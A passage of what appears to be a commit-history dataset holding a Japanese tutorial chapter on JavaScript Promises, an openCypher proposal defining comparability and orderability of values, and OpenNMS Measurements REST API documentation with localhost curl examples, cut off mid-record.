`callback(error,value)` \u3068\u3044\u3046Node.js\u3067\u3088\u304f\u898b\u3089\u308c\u308b\u5f15\u6570\u3092\u6e21\u3059\n\n`jsonParse` \u95a2\u6570\u3092\u4f7f\u3046\u3068\u304d\u306b `bind` \u3092\u4f7f\u3046\u3053\u3068\u3067\u3001\u90e8\u5206\u9069\u5fdc\u3092\u4f7f\u3063\u3066\u7121\u540d\u95a2\u6570\u3092\u6e1b\u3089\u3059\u3088\u3046\u306b\u3057\u3066\u3044\u307e\u3059\u3002\n(\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3067\u3082\u95a2\u6570\u306e\u51e6\u7406\u306a\u3069\u3092\u3061\u3083\u3093\u3068\u5206\u96e2\u3059\u308c\u3070\u3001\u7121\u540d\u95a2\u6570\u306e\u4f7f\u7528\u3082\u6e1b\u3089\u305b\u308b\u3068\u601d\u3044\u307e\u3059)\n\n[source,js]\n----\njsonParse.bind(null, callback);\n\/\/ \u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u7f6e\u304d\u63db\u3048\u308b\u306e\u3068\u6b86\u3069\u540c\u3058\nfunction(error,value){\n jsonParse(callback, error, value);\n}\n----\n\n\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3067\u66f8\u3044\u305f\u3082\u306e\u3092\u898b\u308b\u3068\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u70b9\u304c\u6c17\u306b\u306a\u308a\u307e\u3059\u3002\n\n* \u660e\u793a\u7684\u306a\u4f8b\u5916\u306e\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u304c\u5fc5\u8981\n* \u30cd\u30b9\u30c8\u3092\u6df1\u304f\u3057\u306a\u3044\u305f\u3081\u306b\u3001request\u3092\u6271\u3046\u95a2\u6570\u304c\u5fc5\u8981\n* \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u304c\u305f\u304f\u3055\u3093\u3067\u3066\u304f\u308b\n\n\u6b21\u306f\u3001`Promise#then` \u3092\u4f7f\u3063\u3066\u540c\u69d8\u306e\u4e8b\u3092\u3057\u3066\u307f\u305f\u3044\u3068\u601d\u3044\u307e\u3059\u3002\n\n=== Promise#then\u306e\u307f\u3067\u8907\u6570\u306e\u975e\u540c\u671f\u51e6\u7406\n\n\u5148\u306b\u8ff0\u3079\u3066\u304a\u304d\u307e\u3059\u304c\u3001`Promise.all` \u3068\u3044\u3046\u3053\u306e\u3088\u3046\u306a\u51e6\u7406\u306b\u9069\u5207\u306a\u3082\u306e\u304c\u3042\u308b\u305f\u3081\u3001\n\u30ef\u30b6\u3068 `.then`\u306e\u90e8\u5206\u3092\u30af\u30c9\u304f\u66f8\u3044\u3066\u3044\u307e\u3059\u3002\n\n<<promise.then,`.then`>> \u3092\u4f7f\u3063\u305f\u5834\u5408\u306f\u3001\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3068\u5b8c\u5168\u306b\u540c\u7b49\u3068\u3044\u3046\u308f\u3051\u3067\u306f\u306a\u3044\u3067\u3059\u304c\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u66f8\u3051\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n[[multiple-xhr.js]]\n----\ninclude::embed\/embed-multiple-xhr.js[]\n----\n\n\u4e0a\u8a18\u306e\u30b3\u30fc\u30c9\u3092\u5b9f\u969b\u306b\u5b9f\u884c\u3057\u3066\u3001XHR\u3067\u53d6\u5f97\u3057\u305f\u7d50\u679c\u3092\u5f97\u308b\u306b\u306f\u6b21\u306e\u3088\u3046\u306b\u306a\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n----\nmain().then(function (value) {\n console.log(value);\n}).catch(function(error){\n console.log(error);\n});\n----\n\n<<multiple-xhr-callback.js, \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb>>\u3068\u6bd4\u8f03\u3057\u3066\u307f\u308b\u3068\u6b21\u306e\u4e8b\u304c\u308f\u304b\u308a\u307e\u3059\u3002\n\n* `JSON.parse` \u3092\u305d\u306e\u307e\u307e\u4f7f\u3063\u3066\u3044\u308b\n* `main()` \u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3057\u3066\u3044\u308b\n* \u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u306f\u8fd4\u3063\u3066\u304d\u305fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u5bfe\u3057\u3066\u66f8\u3044\u3066\u3044\u308b\n\n\u5148\u307b\u3069\u3082\u8ff0\u3079\u305f\u3088\u3046\u306b main\u306e `then` \u306e\u90e8\u5206\u304c\u30af\u30c9\u304f\u611f\u3058\u307e\u3059\u3002\n\n\u3053\u306e\u3088\u3046\u306a\u8907\u6570\u306e\u975e\u540c\u671f\u51e6\u7406\u3092\u307e\u3068\u3081\u3066\u6271\u3046 `Promise.all` \u3068 `Promise.race` \u3068\u3044\u3046\u9759\u7684\u30e1\u30bd\u30c3\u30c9\u306b\u3064\u3044\u3066\n\u5b66\u3093\u3067\u3044\u304d\u307e\u3057\u3087\u3046\u3002","old_contents":"[[ch2-promise-and-array]]\n== Promise\u3068\u914d\u5217\n\n\u5148\u307b\u3069\u306e\u7ae0\u3067\u306f\u3001promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304cresolve\u53c8\u306freject\u3055\u308c\u305f\u6642\u306e\u51e6\u7406\u306f <<promise.then,`.then`>> \u3068 <<promise.catch,`.catch`>> \u3092\n\u4f7f\u3046\u3053\u3068\u3067\u884c\u3048\u308b\u4e8b\u3092\u5b66\u3073\u307e\u3057\u305f\u3002\n\n\u4e00\u3064\u306epromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306a\u3089\u3001\u305d\u306epromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u5bfe\u3057\u3066\u51e6\u7406\u3092\u66f8\u3051\u3070\u826f\u3044\u3067\u3059\u304c\u3001\n\u8907\u6570\u306epromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u51e6\u7406\u3092\u66f8\u304f\u5834\u5408\u306f\u3069\u3046\u3059\u308c\u3070\u3088\u3044\u3067\u3057\u3087\u3046\u304b?\n\n\u4f8b\u3048\u3070\u3001A->B->C \u3068\u3044\u3046\u611f\u3058\u3067\u8907\u6570\u306eXHR(\u975e\u540c\u671f\u51e6\u7406)\u3092\u884c\u3063\u305f\u5f8c\u306b\u3001\u4f55\u304b\u3092\u3057\u305f\u3044\u3068\u3044\u3046\u4e8b\u4f8b\u3092\u8003\u3048\u3066\u307f\u307e\u3059\u3002\n\n\u3061\u3087\u3063\u3068\u30a4\u30e1\u30fc\u30b8\u3057\u306b\u304f\u3044\u306e\u3067\u3001\n\u307e\u305a\u306f\u3001\u901a\u5e38\u306e\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3092\u4f7f\u3063\u3066\u8907\u6570\u306eXHR\u3092\u884c\u3046\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30b3\u30fc\u30c9\u3092\u898b\u3066\u307f\u307e\u3059\u3002\n\n=== \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u3067\u8907\u6570\u306e\u975e\u540c\u671f\u51e6\u7406\n\n[source,js]\n[[multiple-xhr-callback.js]]\n.multiple-xhr-callback.js\n----\ninclude::embed\/embed-multiple-xhr-callback.js[]\n----\n\n\u4e0a\u8a18\u306e\u30b3\u30fc\u30c9\u3092\u5b9f\u969b\u306b\u5b9f\u884c\u3057\u3066\u3001XHR\u3067\u53d6\u5f97\u3057\u305f\u7d50\u679c\u3092\u5f97\u308b\u306b\u306f\u6b21\u306e\u3088\u3046\u306b\u306a\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n----\nmain(function(error, results){\n console.log(results);\n});\n----\n\n\u3053\u306e\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3067\u306f\u5e7e\u3064\u304b\u306e\u8981\u7d20\u304c\u51fa\u3066\u304d\u307e\u3059\u3002\n\n* `JSON.parse` \u3092\u305d\u306e\u307e\u307e\u4f7f\u3046\u3068\u4f8b\u5916\u3068\u306a\u308b\u30b1\u30fc\u30b9\u304c\u3042\u308b\u305f\u3081\u30e9\u30c3\u30d7\u3057\u305f`jsonParse`\u95a2\u6570\u3092\u4f7f\u3046\n* \u8907\u6570\u306eXHR\u3092\u305d\u306e\u307e\u307e\u66f8\u304f\u3068\u30cd\u30b9\u30c8\u304c\u6df1\u304f\u306a\u308b\u305f\u3081\u3001`allRequest`\u3068\u3044\u3046request\u95a2\u6570\u3092\u5b9f\u884c\u3059\u308b\u3082\u306e\u3092\u5229\u7528\u3059\u308b\n* \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u95a2\u6570\u306b\u306f `callback(error,value)` \u3068\u3044\u3046Node.js\u3067\u3088\u304f\u898b\u3089\u308c\u308b\u5f15\u6570\u3092\u6e21\u3059\n\n`jsonParse` \u95a2\u6570\u3092\u4f7f\u3046\u3068\u304d\u306b `bind` \u3092\u4f7f\u3046\u3053\u3068\u3067\u3001\u90e8\u5206\u9069\u5fdc\u3092\u4f7f\u3063\u3066\u7121\u540d\u95a2\u6570\u3092\u6e1b\u3089\u3059\u3088\u3046\u306b\u3057\u3066\u3044\u307e\u3059\u3002\n(\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3067\u3082\u95a2\u6570\u306e\u51e6\u7406\u306a\u3069\u3092\u3061\u3083\u3093\u3068\u5206\u96e2\u3059\u308c\u3070\u3001\u7121\u540d\u95a2\u6570\u306e\u4f7f\u7528\u3082\u6e1b\u3089\u305b\u308b\u3068\u601d\u3044\u307e\u3059)\n\n[source,js]\n----\njsonParse.bind(null, callback);\n\/\/ \u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u7f6e\u304d\u63db\u3048\u308b\u306e\u3068\u6b86\u3069\u540c\u3058\nfunction(error,value){\n jsonParse(callback, error, value);\n}\n----\n\n\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3067\u66f8\u3044\u305f\u3082\u306e\u3092\u898b\u308b\u3068\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u70b9\u304c\u6c17\u306b\u306a\u308a\u307e\u3059\u3002\n\n* \u660e\u793a\u7684\u306a\u4f8b\u5916\u306e\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u304c\u5fc5\u8981\n* \u30cd\u30b9\u30c8\u3092\u6df1\u304f\u3057\u306a\u3044\u305f\u3081\u306b\u3001request\u3092\u6271\u3046\u95a2\u6570\u304c\u5fc5\u8981\n* \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u304c\u305f\u304f\u3055\u3093\u3067\u3066\u304f\u308b\n\n\u6b21\u306f\u3001`Promise#then` \u3092\u4f7f\u3063\u3066\u540c\u69d8\u306e\u4e8b\u3092\u3057\u3066\u307f\u305f\u3044\u3068\u601d\u3044\u307e\u3059\u3002\n\n=== Promise#then\u306e\u307f\u3067\u8907\u6570\u306e\u975e\u540c\u671f\u51e6\u7406\n\n\u5148\u306b\u8ff0\u3079\u3066\u304a\u304d\u307e\u3059\u304c\u3001`Promise.all` \u3068\u3044\u3046\u3053\u306e\u3088\u3046\u306a\u51e6\u7406\u306b\u9069\u5207\u306a\u3082\u306e\u304c\u3042\u308b\u305f\u3081\u3001\n\u30ef\u30b6\u3068 `.then`\u306e\u90e8\u5206\u3092\u30af\u30c9\u304f\u66f8\u3044\u3066\u3044\u307e\u3059\u3002\n\n<<promise.then,`.then`>> \u3092\u4f7f\u3063\u305f\u5834\u5408\u306f\u3001\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3068\u5b8c\u5168\u306b\u540c\u7b49\u3068\u3044\u3046\u308f\u3051\u3067\u306f\u306a\u3044\u3067\u3059\u304c\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u66f8\u3051\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n[[multiple-xhr.js]]\n----\ninclude::embed\/embed-multiple-xhr.js[]\n----\n\n\u4e0a\u8a18\u306e\u30b3\u30fc\u30c9\u3092\u5b9f\u969b\u306b\u5b9f\u884c\u3057\u3066\u3001XHR\u3067\u53d6\u5f97\u3057\u305f\u7d50\u679c\u3092\u5f97\u308b\u306b\u306f\u6b21\u306e\u3088\u3046\u306b\u306a\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n----\nmain().then(function (value) {\n console.log(value);\n}).catch(function(error){\n console.log(error);\n});\n----\n\n<<multiple-xhr-callback.js, \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb>>\u3068\u6bd4\u8f03\u3057\u3066\u307f\u308b\u3068\u6b21\u306e\u4e8b\u304c\u308f\u304b\u308a\u307e\u3059\u3002\n\n* `JSON.parse` \u3092\u305d\u306e\u307e\u307e\u4f7f\u3063\u3066\u3044\u308b\n* `main()` \u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3057\u3066\u3044\u308b\n* \u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u306f\u8fd4\u3063\u3066\u304d\u305fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u5bfe\u3057\u3066\u66f8\u3044\u3066\u3044\u308b\n\n\u5148\u307b\u3069\u3082\u8ff0\u3079\u305f\u3088\u3046\u306b main\u306e `then` \u306e\u90e8\u5206\u304c\u30af\u30c9\u304f\u611f\u3058\u307e\u3059\u3002\n\n\u3053\u306e\u3088\u3046\u306a\u8907\u6570\u306e\u975e\u540c\u671f\u51e6\u7406\u3092\u307e\u3068\u3081\u3066\u6271\u3046 `Promise.all` \u3068 `Promise.race` \u3068\u3044\u3046\u9759\u7684\u30e1\u30bd\u30c3\u30c9\u306b\u3064\u3044\u3066\n\u5b66\u3093\u3067\u3044\u304d\u307e\u3057\u3087\u3046\u3002","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"880d71700ee6b4d80ce94568d94bb2dc8f20c9f1","subject":"Addressed feedback; also aligned comparability and orderability with each other to simplify the mental model","message":"Addressed feedback; also aligned comparability and orderability with each other to simplify the mental model\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2016-06-14-Comparability-and-orderability.adoc","new_file":"cip\/CIP2016-06-14-Comparability-and-orderability.adoc","new_contents":"= CIP2016-06-14 - Comparability and Orderability\n:numbered:\n:toc:\n:toc-placement: macro\n:source-highlighter: codemirror\n\n*Author:* Mats Rydberg <mats@neotechnology.com>, Stefan Plantikow <stefan.plantikow@neotechnology.com>\n\n[abstract]\n.Abstract\n--\nThis CIP intends to introduce and formalise two new concepts, *orderability* and *comparability*, and defines their relationship to the already existing concepts of *equality* and *equivalence*.\nOrderability revolves around the `ORDER BY` clause, and defines the semantics it needs to be able to properly sort values passed to it.\nComparability revolves around the inequality operators (`>`, `<`, `>=`, `<=`), and defines the semantics they need to properly determine how two values compare to each other.\nIn order to get a consistent set of rules, we are proposing some changes to how Cypher defines these concepts.\n--\n\ntoc::[]\n\n\n== Motivation\n\nThere are currently a number of limitations and inconsistencies that this CIP will try to fix.\n\n- `ORDER BY` will fail with an error if the values passed to it have different types.\n- Various inconsistencies around equality semantics as exposed by `IN`, `=`, `DISTINCT`, and grouping\n- Unclear relationship between comparison operators, equality, and `ORDER BY`\n\nThe difference between equality and equivalence in Cypher today is small and subtle, and limited to testing two instances of the value `null` to each other.\n\n- In equality, `null = null` is `null`\n- In equivalence, used by grouping and `DISTINCT`, instances of `null` are treated as being the same value\n\nThis proposal aims to increase the difference between these two concepts, by making lists containing `null` values follow the same difference as the `null` values themselves.\n\n== Proposal\n\nCurrently, Cypher has good semantics for equality within the primitive types (booleans, strings, integers, and floats) and maps.\nFurthermore, Cypher has good semantics for comparability and orderability for integers, floats, and strings, within the types.\nBetween different types, however, the comparability is undefined, which is something we regard as a problem for certain combinations of values and types. Also comparability and orderability are not aligned with each other consistently\n\nWe propose that comparability be defined between any pair of values, where the result of a comparison is `null`, unless otherwise specified.\n\n- Integers are compared according to their natural ordering.\n- Floats (excluding `NaN`s) are compared according to their natural ordering. Infinities are the highest\/lowest values respectively.\n- Integers and floats are compared to each other according to their natural ordering.\n- Comparing any number to a `NaN` always yields `NaN`.\n- Booleans are compared such that `false < true`.\n- Strings are compared in dictionary order, i.e. characters are compared pairwise in order and characters missing in a shorter string are considered to be smaller than any other character. For example, `'a' < 'aa'`.\n- Lists are compared in dictionary order, i.e. list elements are compared pairwise in order and elements missing in a shorter list are considered to be smaller than any other value. For example, `[1] < [1,0]`.\n- Maps are compared as if they where lists of lists, where the inner lists are the key-value pairs of the maps, ordered in ascending sort order for the keys and omitting map entries where the value is `null`. Comparing a map to a value that is not a map always yields 'null'.\n- The comparison order for nodes (and relationships resp.) is undefined, and an implementation may choose an order for these freely, e.g. by using some kind of id. This order must not change during the execution of the query (i.e. it must be stable in the presence of updates). Comparing a node to a relationship always yields 'null'.\n- Paths are compared as if they where a list of alternating nodes and relationships of the path from the start node to the end node. Comparing a path to a value that is not a path always yields 'null'.\n- Comparing any other combination of values of different types would yield `null` (meaning \"unknown\" in the context of comparability).\n\nWe further propose that orderability be defined between any pair of values, where the result is always `true` or `false`; i.e. always defined.\nTo accomplish this, there must be a pre-determined type order and each value must fall under exactly one type in this order. We propose to use the following ascending global sort order:\n\n- `NODE`\n- `RELATIONSHIP`\n- `PATH`\n- `MAP`\n- `LIST OF ANY?`\n- `STRING`\n- `BOOLEAN`\n- `NUMBER` (`NaN` is treated as the largest number in orderability, i.e. it is put after positive infinity)\n- `VOID` (i.e. `null`)\n\nWithin the types, orderability defers to comparability.\n\nThe accompanying descending global sort oder is the same order in reverse (i.e. it runs from `VOID` to `NODE`).\n\nFinally, we propose to redefine how equality works for lists in Cypher today.\nThe main issue is how Cypher deals with lists that contain the `null` value.\nTo determine if two lists `l1` and `l2` are equal, we propose two simple tests, like so\n\n- `l1` and `l2` must have the same size, i.e. inversely `size(l1) <> size(l2>) => l1 <> l2`\n- the pairwise elements of both `l1` and `l2` must be equal, i.e.\n----\n[a1, a2, ...] = [b1, b2, ...]\n<=>\na1 = b1 && a2 = b2 && ...\n----\n\n=== Examples\n\nAn integer compared to a float\n[source, cypher]\n----\nRETURN 1 > 0.5 \/\/ should be true\n----\n\nA string compared to a boolean\n[source, cypher]\n----\nRETURN 'string' <= true \/\/ should be null\n----\n\nOrdering values of different types\n[source, cypher]\n----\nUNWIND [1, true, '', 3.14, {}, [2]] AS i\nRETURN i\n ORDER BY i \/\/ should not crash\n----\n\nFiltering distinct values of different types\n[source, cypher]\n----\nUNWIND [[null], [null]] AS i\nRETURN DISTINCT i \/\/ should return exactly one row\n----\n\n=== Interaction with existing features\n\nThe concept of orderability is used only by `ORDER BY` in Cypher today.\nThe concept of comparability is used by the comparisons operators `<`, `>`, `<=`, >=`.\n\nOne major goal of our proposal is for equality semantics to align well with comparability.\nThe concept of equality is used by the equality operator `=`, the inequality operator `<>`, value joins, and the `IN` operator.\nThe concept of equivalence is used by the `DISTINCT` clause modifier and in grouping.\n\nWith the proposals made in this CIP, specifically changing equality for lists, the mentioned functionality is going to treat lists containing `null` as unequal, thus potentially filtering out more rows when used in a predicate.\n\n=== Alternatives\n\nThis proposal could be extended with an operator for making equivalence accessible beyond use in grouping and `DISTINCT`.\n\n== Benefits to this proposal\n\nA consistent set of rules for equality, equivalence, comparability and orderability.\n\n== Caveats to this proposal\n\nAdopting this proposal may break some queries; specifically queries that depend on equality semantics of lists containing nulls.\nIt should be noted that we expect that most lists used in queries are constructed using `collect()`, which never outputs nulls.\n\n=== Appendix: Comparability by Type\n\nThe following table captures which types may be compared with each other such that the outcome is either `true` or `false`.\nAny other comparison will always yield `null` (except for `NaN`) which is handled as described above.\n\n.Comparability by type\n[frame=\"topbot\",options=\"header,footer\"]\n|===========================================================================================================================================\n|Type | `NODE` | `RELATIONSHIP` | `PATH` | `MAP` | `LIST OF ANY?` | `STRING` | `BOOLEAN` | `NUMBER` | `INTEGER` | `FLOAT` | `VOID`\n|`NODE` | X | | | | | | | | | |\n|`RELATIONSHIP` | | X | | | | | | | | |\n|`PATH` | | | X | | | | | | | |\n|`MAP` | | | | X | | | | | | |\n|`LIST OF ANY?` | | | | | X | | | | | |\n|`STRING` | | | | | | X | | | | |\n|`BOOLEAN` | | | | | | | X | | | |\n|`NUMBER` | | | | | | | | X | X | X |\n|`INTEGER` | | | | | | | | X | X | X |\n|`FLOAT` | | | | | | | | X | X | X |\n|`VOID` | | | | | | | | | | |\n|===========================================================================================================================================\n`\n","old_contents":"= CIP2016-06-14 - Comparability and Orderability\n:numbered:\n:toc:\n:toc-placement: macro\n:source-highlighter: codemirror\n\n*Author:* Mats Rydberg <mats@neotechnology.com>, Stefan Plantikow <stefan.plantikow@neotechnology.com>\n\n[abstract]\n.Abstract\n--\nThis CIP intends to introduce and formalise two new concepts, Orderability and Comparability, and defines their relationship to the already existing concepts of equality and equivalence.\nOrderability revolves around the `ORDER BY` clause, and defines the semantics it needs to be able to properly sort values passed to it.\nComparability revolves around the inequality operators (`>`, `<`, `>=`, `<=`), and defines the semantics they need to properly determine how two values compare to each other.\nIn order to get a consistent set of rules, we are also proposing some changes to how Cypher deals with equality.\n--\n\ntoc::[]\n\n\n== Motivation\n\nThere are currently a number of limitations and inconsistencies that this CIP will try to fix.\n\n- `ORDER BY` will fail with an error if the values passed to it have different types.\n- Various inconsistencies around equality semantics as exposed by `IN`, `=`, `DISTINCT`, and grouping\n- Unclear relationship between comparison operators, equality, and `ORDER BY`\n\nThe difference between equality and equivalence in Cypher today is small and subtle, and limited to testing two instances of the value `null` to each other.\n\n- In equality, `null = null` is `null`\n- In equivalence, used by grouping and `DISTINCT`, instances of `null` are seen as the same\n\nThis proposal aims to increase the difference between these two concepts, by making lists containing nulls follow the same difference as the null values themselves.\n\n== Proposal\n\nCurrently, Cypher has good semantics for equality within the primitive types (booleans, strings, integers, and floats) and maps.\nFurthermore, Cypher has good semantics for comparability and orderability for integers, floats, and strings, within the types.\nBetween different types, however, the comparability is undefined, which is something we regard as a problem for certain combinations of values and types.\n\nWe propose that comparability be defined between any pair of values, where the result of a comparison is `null`, unless otherwise specified.\n\n- Integers are compared according to their natural ordering.\n- Floats (excluding `NaN`s) are compared according to their natural ordering. Infinities are the highest\/lowest values respectively.\n- Integers and floats are compared to each other according to their natural ordering.\n- Strings are compared in dictionary order.\n- Lists are compared in dictionary order. List elements are compared pairwise in order.\n- Booleans, maps, nodes, relationships, and paths are incomparable both within types and between types.\n- Any other combination of values of different types would yield `null`.\n\nWe further propose that orderability be defined between any pair of values, where the result is always `true` or `false`; ie always defined.\nTo accomplish this, there must be a pre-determined type order, and we propose the following order, ascending:\n\n- null\n- paths\n- relationships\n- nodes\n- maps\n- lists\n- strings\n- booleans\n- numbers\n- `NaN`\n\nWithin the types, orderability defers to comparability for the types were comparability is defined (numbers, strings, lists).\n- The order for nodes and relationships is undefined, and an implementation may choose a global sort order for these freely.\n- The order for paths is that of a list of nodes and relationships.\n- The order for maps is that of a list of lists, where the inner lists are the key-value pair of the maps, ordered in ascending sort order for the keys.\n\n\nFinally, we propose to redefine how equality works for lists in Cypher today.\nThe main issue is how Cypher deals with lists that contain the `null` value.\nWe propose a simple rule, like so\n----\n[a1, a2, ...] = [b1, b2, ...]\n<=>\na1 = b1 && a2 = b2 && ...\n----\n\n=== Examples\n\nAn integer compared to a float\n[source, cypher]\n----\nRETURN 1 > 0.5 \/\/ should be true\n----\n\nA string compared to a boolean\n[source, cypher]\n----\nRETURN 'string' <= true \/\/ should be null\n----\n\nOrdering values of different types\n[source, cypher]\n----\nUNWIND [1, true, '', 3.14, {}, [2]] AS i\nRETURN i\n ORDER BY i \/\/ should not crash\n----\n\nFiltering distinct values of different types\n[source, cypher]\n----\nUNWIND [[null], [null]] AS i\nRETURN DISTINCT i \/\/ should return two rows\n----\n\n=== Semantics\n\n\/\/Provide a description of the expected semantics of the new feature(s).\n\/\/Use subheadings to structure the content.\n\/\/\n\/\/_Examples are shown below in sections 3.3.1\u20133.3.3:_\n\n=== Interaction with existing features\n\nThe concept of orderability is used only by `ORDER BY` in Cypher today.\nThe concept of comparability is used by the comparisons operators `<`, `>`, `<=`, >=`.\n\nOne major goal of our proposal is for equality semantics to align well with comparability.\nThe concept of equality is used by the equality operator `=`, the inequality operator `<>`, `DISTINCT`, value joins, and grouping.\nWith the proposals made in this CIP, specifically changing equality for lists, the mentioned functionality is going to treat lists containing `null` as unequal, thus producing more rows (in general).\n\n=== Alternatives\n\nThis proposal could be extended to define comparability for maps, booleans, and graph types.\n\nThis proposal could be extended with a new way to express current grouping semantics (structural equivalence).\n\n- DISTINCT ~ foo, ~ bar\n- lhs ~ rhs\n- ~ expr IN list\n\n== What others do\n\nIf applicable, include a feature comparison table, along with any useful links.\n\nTo provide a well-rounded comparison, please ensure the inclusion of at least one SQL-based implementation -- such as DB2 or Postgres -- as well as SPARQL.\nIf you require any assistance or pointers to the latter, please contact petra.selmer@neotechnology.com.\n\n== Benefits to this proposal\n\nA consistent set of rules for equality, comparability and orderability.\n\n== Caveats to this proposal\n\nAdopting this proposal may break some queries; specifically queries that depend on equality semantics of lists containing nulls.\nIt should be noted that we expect that most lists used in queries are constructed using `collect()`, which never outputs nulls.\n\n== Appendix\n\nPut any supplementary information here.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9a74f80c80382d06a39f25bc940721a254e80585","subject":"Measurement ReST API: better explanation of the \"start\" option","message":"Measurement ReST API: better explanation of the \"start\" option","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-development\/src\/asciidoc\/text\/rest\/measurements.adoc","new_file":"opennms-doc\/guide-development\/src\/asciidoc\/text\/rest\/measurements.adoc","new_contents":"==== Measurements API\n\nThe _Measurements API_ can be used to retrieve collected values stored in _RRD_ (or _JRB_) files.\nNote that all units of time are expressed in milliseconds.\n\n===== GETs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements\/{resourceId}\/{attribute}` | Retrieve the measurements for a single attribute\n|===\n\nThe following table shows all supported query string parameters and their default values.\n\n[options=\"header\"]\n|===\n| name | default | comment\n| start | -14400000 | Timestamp in milliseconds.\n\n If > 0, the timestamp is relative to the UNIX epoch (January 1st 1970 00:00:00 AM).\n \n If < 0, the timestamp is relative to the `end` option (i.e.: default value is 4 hours ago).\n| end | 0 | Timestamp in milliseconds. If \\<= 0, the effective value will be the current timestamp.\n| step | 300000 | Requested time interval between rows. Actual step may differ. Set to 1 for maximum accuracy.\n| maxrows | 0 | When using the measurements to render a graph, this should be set to the graph's pixel width.\n| interval | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| heartbeat | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| aggregation | AVERAGE | Consolidation function used. Can typically be `AVERAGE`, `MIN` or `MAX`. Depends on `RRA` definitions.\n| fallback-attribute | | Secondary attribute that will be queried in the case the primary attribute does not exist.\n|===\n\n===== Usage examples with curl\n\n.Retrieve CPU counter metrics over the last 2 hours for node 1\n[source,bash]\n----\ncurl -u admin:admin \"http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\/node%5B1%5D.nodeSnmp%5B%5D\/CpuRawUser?start=-7200000&maxrows=30&aggregation=AVERAGE\"\n----\n\n.Response\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<query-response end=\"1425588138256\" start=\"1425580938256\" step=\"300000\">\n <columns>\n <values>159.5957271523179<\/values>\n <values>158.08531037527592<\/values>\n <values>158.45835584842285<\/values>\n ...\n <\/columns>\n <labels>CpuRawUser<\/labels>\n <timestamps>1425581100000<\/timestamps>\n <timestamps>1425581400000<\/timestamps>\n <timestamps>1425581700000<\/timestamps>\n ...\n<\/query-response>\n----\n\n===== POSTs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements` | Retrieve the measurements for one or more attributes, possibly spanning multiple resources, with support for JEXL expressions.\n|===\n\nHere we use a POST instead of a GET to retrieve the measurements, which allows us to perform complex queries which are difficult to express in a query string.\nThese requests cannot be used to update or create new metrics.\n\nAn example of the POST body is available bellow.\n\n===== Usage examples with curl\n\n.Retrieve bits in and bits out metrics for a particular interface. Perform calculations on bits out, and only return the derived values.\n[source,bash]\n----\ncurl -X POST -H \"Accept: application\/json\" -H \"Content-Type: application\/json\" -u admin:admin -d @report.json http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\n----\n\n.Contents of report.json\n[source,javascript]\n----\n{\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"step\": 10000,\n \"maxrows\": 1600,\n \"source\": [\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCInOctets\",\n \"label\": \"ifHCInOctets\",\n \"resourceId\": \"nodeSource[Servers:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"false\"\n },\n {\n \"aggregation\": \"AVERAGE\",\n 